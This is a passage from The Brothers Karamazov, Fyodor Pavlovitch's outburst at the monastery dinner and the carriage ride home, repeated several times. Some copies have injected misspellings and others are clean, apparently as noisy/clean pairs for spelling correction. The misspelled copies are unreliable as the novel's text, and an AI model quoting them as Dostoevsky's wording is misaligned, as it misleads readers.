"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew where to look for the weak spot. There had been at one time malicious rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the institution of elders existed) that too much respect was paid to the elders, even to the detriment of the authority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearing him on the current of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneeling and confessing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audience, and above all to himself, that he had not been talking nonsense. And, though he knew perfectly well that with each word he would be adding more and more absurdity, he could not restrain himself, and plunged forward blindly.
"How disgraceful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak against me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correction of the Lord and He has sent it to heal my vain soul.' And so we humbly thank you, honored guest!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniousness and stock phrases! Old phrases and old gestures. The old lies and formal prostrations. We know all about them. A kiss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the truth is not to be found in eating gudgeon and that I proclaim aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being virtuous in the world, do good to society, without shutting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find that a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gatherer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obstinately silent. Miusov rushed from the room, and Kalganov after him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humiliation I endured." He thumped the table with his fist in a paroxysm of simulated feeling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalism, the age of steamers and railways. Neither a thousand, nor a hundred roubles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his life, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one moment almost believing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is written again, 'Bear circumspectly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselves, Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brandy and liqueur to it.... I've cloudberry wine. Hey, von Sohn, don't lose your chance." He went out, shouting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, catching sight of him. "You come home to me to-day, for good, and bring your pillow and mattress, and leave no trace behind."
Alyosha stood rooted to the spot, watching the scene in silence. Meanwhile, Fyodor Pavlovitch had got into the carriage, and Ivan was about to follow him in grim silence without even turning to say good-bye to Alyosha. But at this point another almost incredible scene of grotesque buffoonery gave the finishing touch to the episode. Maximov suddenly appeared by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him running. He was in such a hurry that in his impatience he put his foot on the step on which Ivan's left foot was still resting, and clutching the carriage he kept trying to jump in. "I am going with you!" he kept shouting, laughing a thin mirthful laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delighted. "Did I not say he was von Sohn? It is von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprised at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somewhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skip on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a violent punch in the breast and sent him flying. It was quite by chance he did not fall.
"Drive on!" Ivan shouted angrily to the coachman.
"Why, what are you doing, what are you about? Why did you do that?" Fyodor Pavlovitch protested.
But the carriage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch said again.
After a pause of two minutes, looking askance at his son, "Why, it was you got up all this monastery business. You urged it, you approved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observed sententiously, but Ivan made no response.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
Miusov, as a man of breeding and delicacy, could not but feel some inward qualms, when he reached the Father Superior's with Ivan: he felt ashamed of having lost his temper. He felt that he ought to have disdained that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "The monks were not to blame, in any case," he reflected, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous with them? I won't argue, I'll fall in with everything, I'll win them by politeness, and show them that I've nothing to do with that Aesop, that buffoon, that Pierrot, and have merely been taken in over this affair, just as they have."
He determined to drop his litigation with the monastery, and relinquish his claims to the wood-cutting and fishery rights at once. He was the more ready to do this because the rights had become much less valuable, and he had indeed the vaguest idea where the wood and river in question were.
These excellent intentions were strengthened when he entered the Father Superior's dining-room, though, strictly speaking, it was not a dining-room, for the Father Superior had only two rooms altogether; they were, however, much larger and more comfortable than Father Zossima's. But there was no great luxury about the furnishing of these rooms either. The furniture was of mahogany, covered with leather, in the old-fashioned style of 1820; the floor was not even stained, but everything was shining with cleanliness, and there were many choice flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beautifully decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neighborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-soup made of sterlets, served with little fish pasties; then boiled fish served in a special way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footing everywhere, and got information about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominent part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorable, and quite unconscious of being so himself, considering, on the contrary, that because he would not steal money left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have influenced him in that.
Rakitin, of course, was a person of too little consequence to be invited to the dinner, to which Father Iosif, Father Paissy, and one other monk were the only inmates of the monastery invited. They were already waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streaked with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approached to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to avoid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peasants do.
"We must apologize most humbly, your reverence," began Miusov, simpering affably, and speaking in a dignified and respectful tone. "Pardon us for having come alone without the gentleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitality, and not without reason. In the reverend Father Zossima's cell he was carried away by the unhappy dissension with his son, and let fall words which were quite out of keeping... in fact, quite unseemly... as" -- he glanced at the monks -- "your reverence is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologies and regrets. In brief, he hopes and desires to make amends later. He asks your blessing, and begs you to forget what has taken place."
As he uttered the last word of his tirade, Miusov completely recovered his self-complacency, and all traces of his former irritation disappeared. He fully and sincerely loved humanity again.
The Father Superior listened to him with dignity, and, with a slight bend of the head, replied:
"I sincerely deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holy image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculiar fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he really had meant to go home, and really had felt the impossibility of going to dine with the Father Superior as though nothing had happened, after his disgraceful behavior in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet his creaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he suddenly stopped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffoon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everyone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shameless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Remembering that now, he smiled quietly and malignantly, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expressed in the following words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worth. I will show them I don't care what they think -- that's all!"
He told the coachman to wait, while with rapid steps he returned to the monastery and straight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obscenity, but only to obscenity, to nothing criminal, nothing for which he could be legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeared in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicious chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the whole room.
For one moment everyone stared at him without a word; and at once everyone felt that something revolting, grotesque, positively scandalous, was about to happen. Miusov passed immediately from the most benevolent frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutely cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certainly cannot? Your reverence, am I to come in or not? Will you receive me as your guest?"
"You are welcome with all my heart," answered the Superior. "Gentlemen!" he added, "I venture to beg you most earnestly to lay aside your dissensions, and to be united in love and family harmony -- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cried Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywhere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my relation. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" muttered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior could not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famous murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you -- he was killed and robbed, and in spite of his venerable age, he was nailed up in a box and sent from Petersburg to Moscow in the luggage van, and while they were nailing him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Sohn. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the group of monks.
"Let us go," cried Miusov, addressing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another step into the room. "Allow me to finish. There in the cell you blamed me for behaving disrespectfully just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honour, and I want to speak my mind. Yes, I am the soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and having a look on the sly; and now I want to give you the last act of the performance. You know how things are with us? As a thing falls, so it lies. As a thing once has fallen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignant with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneel down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in secret: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... at the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew where to look for the weak spot. There had been at one time malicious rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the institution of elders existed) that too much respect was paid to the elders, even to the detriment of the authority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearing him on the current of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneeling and confessing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audience, and above all to himself, that he had not been talking nonsense. And, though he knew perfectly well that with each word he would be adding more and more absurdity, he could not restrain himself, and plunged forward blindly.
"How disgraceful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak against me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correction of the Lord and He has sent it to heal my vain soul.' And so we humbly thank you, honored guest!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniousness and stock phrases! Old phrases and old gestures. The old lies and formal prostrations. We know all about them. A kiss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the truth is not to be found in eating gudgeon and that I proclaim aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being virtuous in the world, do good to society, without shutting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find that a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gatherer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obstinately silent. Miusov rushed from the room, and Kalganov after him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humiliation I endured." He thumped the table with his fist in a paroxysm of simulated feeling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalism, the age of steamers and railways. Neither a thousand, nor a hundred roubles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his life, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one moment almost believing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is written again, 'Bear circumspectly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselves, Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brandy and liqueur to it.... I've cloudberry wine. Hey, von Sohn, don't lose your chance." He went out, shouting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, catching sight of him. "You come home to me to-day, for good, and bring your pillow and mattress, and leave no trace behind."
Alyosha stood rooted to the spot, watching the scene in silence. Meanwhile, Fyodor Pavlovitch had got into the carriage, and Ivan was about to follow him in grim silence without even turning to say good-bye to Alyosha. But at this point another almost incredible scene of grotesque buffoonery gave the finishing touch to the episode. Maximov suddenly appeared by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him running. He was in such a hurry that in his impatience he put his foot on the step on which Ivan's left foot was still resting, and clutching the carriage he kept trying to jump in. "I am going with you!" he kept shouting, laughing a thin mirthful laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delighted. "Did I not say he was von Sohn? It is von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprised at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somewhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skip on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a violent punch in the breast and sent him flying. It was quite by chance he did not fall.
"Drive on!" Ivan shouted angrily to the coachman.
"Why, what are you doing, what are you about? Why did you do that?" Fyodor Pavlovitch protested.
But the carriage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch said again.
After a pause of two minutes, looking askance at his son, "Why, it was you got up all this monastery business. You urged it, you approved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observed sententiously, but Ivan made no response.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with dignity, and, with a slight bend of the head, replied:
"I sincerely deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holy image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculiar fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he really had meant to go home, and really had felt the impossibility of going to dine with the Father Superior as though nothing had happened, after his disgraceful behavior in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet his creaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he suddenly stopped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffoon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everyone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shameless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Remembering that now, he smiled quietly and malignantly, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expressed in the following words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worth. I will show them I don't care what they think -- that's all!"
He told the coachman to wait, while with rapid steps he returned to the monastery and straight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obscenity, but only to obscenity, to nothing criminal, nothing for which he could be legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeared in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicious chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the whole room.
For one moment everyone stared at him without a word; and at once everyone felt that something revolting, grotesque, positively scandalous, was about to happen. Miusov passed immediately from the most benevolent frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutely cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certainly cannot? Your reverence, am I to come in or not? Will you receive me as your guest?"
"You are welcome with all my heart," answered the Superior. "Gentlemen!" he added, "I venture to beg you most earnestly to lay aside your dissensions, and to be united in love and family harmony -- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cried Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywhere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my relation. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" muttered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior could not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famous murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you -- he was killed and robbed, and in spite of his venerable age, he was nailed up in a box and sent from Petersburg to Moscow in the luggage van, and while they were nailing him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Sohn. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the group of monks.
"Let us go," cried Miusov, addressing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another step into the room. "Allow me to finish. There in the cell you blamed me for behaving disrespectfully just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am the soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and having a look on the sly; and now I want to give you the last act of the performance. You know how things are with us? As a thing falls, so it lies. As a thing once has fallen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignant with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneel down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in secret: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... at the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew where to look for the weak spot. There had been at one time malicious rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the institution of elders existed) that too much respect was paid to the elders, even to the detriment of the authority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearing him on the current of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneeling and confessing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audience, and above all to himself, that he had not been talking nonsense. And, though he knew perfectly well that with each word he would be adding more and more absurdity, he could not restrain himself, and plunged forward blindly.
"How disgraceful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak against me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correction of the Lord and He has sent it to heal my vain soul.' And so we humbly thank you, honored guest!" and he made Fyodor Pavlovitch a low bow.
